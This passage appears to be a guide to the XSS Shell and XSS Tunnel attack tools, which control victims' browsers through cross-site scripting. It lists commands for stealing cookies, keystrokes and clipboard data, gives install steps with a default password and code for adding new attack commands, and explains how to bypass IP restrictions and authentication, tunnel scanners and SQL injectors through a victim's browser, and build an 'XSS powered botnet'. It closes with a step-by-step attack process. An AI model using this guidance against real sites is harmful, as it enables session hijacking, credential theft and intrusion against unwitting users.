o Get Cookie o Get Current Page o Execute custom Javascript o Get Mouse Log o Get Keylogger Data o Get Clipboard o Get an Internal IP Address (Firefox - JVM) o Check visited (CSS history hack) o Crash Browser (if you don’t like your Slave!)

Key Feature:

• Regenerating Pages: this is one of the keys and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even when a user clicks on any of the infected pages they will be still under control! (within cross-domain restrictions) In normal XSS attacks when the user leaves the page nothing can be done. Secondly, this feature keeps the session open so even the victims follow an outside from the infected page session which is not going to timeout and the attacker will be still in charge. -Keylogger. {As Said Above in Shell Commands} -Mouse Logger (click points + current DOM).{As Said Above in Shell Commands}

Install

1. Download the Attachment, XSS Shell was written in ASP. As the backend, it uses MS Access for portability and easy installation. It requires IIS 5 or above to work.

To Install The Admin Interface;

1. Copy the "xssshell" folder into the web server
2. Modify the hard-coded password in db.asp [default password is: w00t]
3. Access the admin interface from something like: http://[YOURHOST]/xssshell/admin/
4. Setup permissions for the database folder (write/read access for IUSR_wink

To Configure The XSS Shell For Communication;

1. Open xssshell.asp
2. Set the "SERVER" variable to the location of XSSShell folder, i.e: "http://[YOURHOST]/xssshell/";

You should now be able to open the admin interface from your browser http://[YOURHOST]/xssshell/admin/. Testing should be possible by modifying the "sample_victim/default.asp" source code and replacing the "http://[YOURHOST]/xssshell/xssshell.asp" URL with a specific (i.e your own) XSS Shell URL. Open the "sample_victim" folder in another browser and may then be uploaded to another server.

Now a zombie in the admin interface should be visible. Write something into the "parameters" text area and click "alert()". An alert message should appear in the Slave's browser. Security & Extra Configuration:-

1. Copy "DB" to a secure place (below root)
2. Configure "database path" from "xssshell/db.asp" (it's recommended to not enable parent paths and use the full path for DB path)
3. Configure your web server to not show any errors.

If file names are changed; Be sure to check the "ME", "CONNECTOR", and "COMMANDS_URL" variables in xssshell.asp.

HOW CAN YOU EXTEND?

First, implement the new functionality to xssshell.asp

1. Add new enum for your control

2. Set a name and unique number like "CMD_GETCOOKIE"

var CMD_SAMPLE = 78;

• Set datatype for your response (generally TEXT),

  dataTypes[CMD_SAMPLE] = TEXT;
  

• Write the function and add it to the page

  function cmdSample(){return "yeah working !"}
  

• Call it
• Go inside to "function processGivenCommand(cmd)"
• Add a new case such as

  "case CMD_SAMPLE:"
  

• Report it back
• Inside the case call log;

"log(cmdSample(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");"

Secondly, Implement it in the admin interface;

1. In db.asp just add a new element to the "Commands" array (command name, command unique number, description). Code: i.e. "cmdSample()",78,"Command sample ! which just returns a message"

There are parameters and lots of helpers in the code. Investigate other commands for reference. Enable the debug feature in order to debug the new commands easily. Debug has several levels, which can be increased in number to get more detailed debug information.

Known Bugs :-

• Keylogger is not working on IE
• Not working on Konqueror(a freeware browser for Linux.)

Why Is It Better Than The Classic

XSS Attacks?

· An attacker would have more than one shot. After controlling a Slave(s) browser the attacker is able to decide their next move based on responses and the current environment. · It enables you to bypass the following; o IP Restrictions, o Basic/NTLM Auth Based or similar authentications. · As it is the intention to send alert(“0wned!”) to thousands of victims and build a temporary XSS powered botnet!

Why Tunnel HTTP Traffic Through An

XSS Channel?

An XSS vulnerability is exploited and the admin session is eventually obtained and it turns out that the admin pages are IP restricted. It does not matter because by using an XSS Shell it is possible to bypass this restriction. However, a Blind SQL Injection is then found in the admin part of the page; it is well known that it is quite impossible to exploit a Blind SQL Injection manually. It is now possible to write a Blind SQL Injector into JavaScript or to configure a favorite SQL Injection tool using the XSS Tunnel and tunnel all of the traffic through previous XSS Channels and exploit it easily.

Benefits Of XSS Tunnelling

· It enables the use of virtually any tools that support HTTP Proxies! · It is possible to use automated tools such as Nikto, SQL Injectors, HTTP brute forcer against an IP restricted areas of the website, · It allows the configuration of your local browser to use the XSS Tunnel and browse the website with a Slave’s credentials from your own browser and it does not involve the use of any kind of complicated cookie / IP / user agent based checks, · It is very good for demonstrating the result of an XSS attack.

How Does XSS Tunnel Work?

1. The XSS Tunnel connects to a specified XSS Shell and obtains the current active identifier (the Slave to be controlled)

2. The local HTTP client (browser, Nikto, etc.) sends HTTP requests to the XSS Tunnel:

3. The XSS Tunnel converts the HTTP requests into requests which the

4. XSS Shell can understand and process. It then sends these requests to
5. the XSS Shell Server.

6. The XSS Shell Server saves this request to its database (All these requests only work for a specified Slave by the XSS Tunnel. This ID can be seen in the dashboard of the XSS Tunnel).

7. The XSS Shell Client (which resides in JavaScript in the Slave’s browser) performs periodic requests for the XSS Shell Server and checks for new commands to process.

This process requires cross-domain reading. The XSS Shell uses remote JavaScript loading to bypass the same-origin policy restrictions.

If there are new commands, it loads them and processes and sends the responses (this can be simply a confirmation code or source code of a page or a binary file) to the XSS Shell server. Commands and responses run in a multithreaded fashion.

1. XSS Tunnel in the local cache, checks the XSS Shell Server for a response for previously assigned requests. If there is a response it converts the response to a valid HTTP response and sends it to the client application.

By default, the XSS Tunnel caches JavaScript, CSS, and image files for better performance. This is really required if using the XSS Tunnel with a browser. If requested the resource is already in the cached XSS Tunnel and can be obtained from the local cache and sent to the client application.

Caching can be disabled or the cache can be managed from the user interface of XSS Tunnel.

An Attack Process.

1. Setup the XSS Shell Server,
2. Configure the XSS Tunnel to use the XSS Shell Server,
3. Prepare the XSS attack (submit to a vulnerable website etc.),
4. Launch the XSS Tunnel and wait for a Slave,
5. Configure the tool or browser to use the XSS Tunnel,
6. When you see Slave in the XSS Tunnel, start to use your browser/tool for the targeted domain.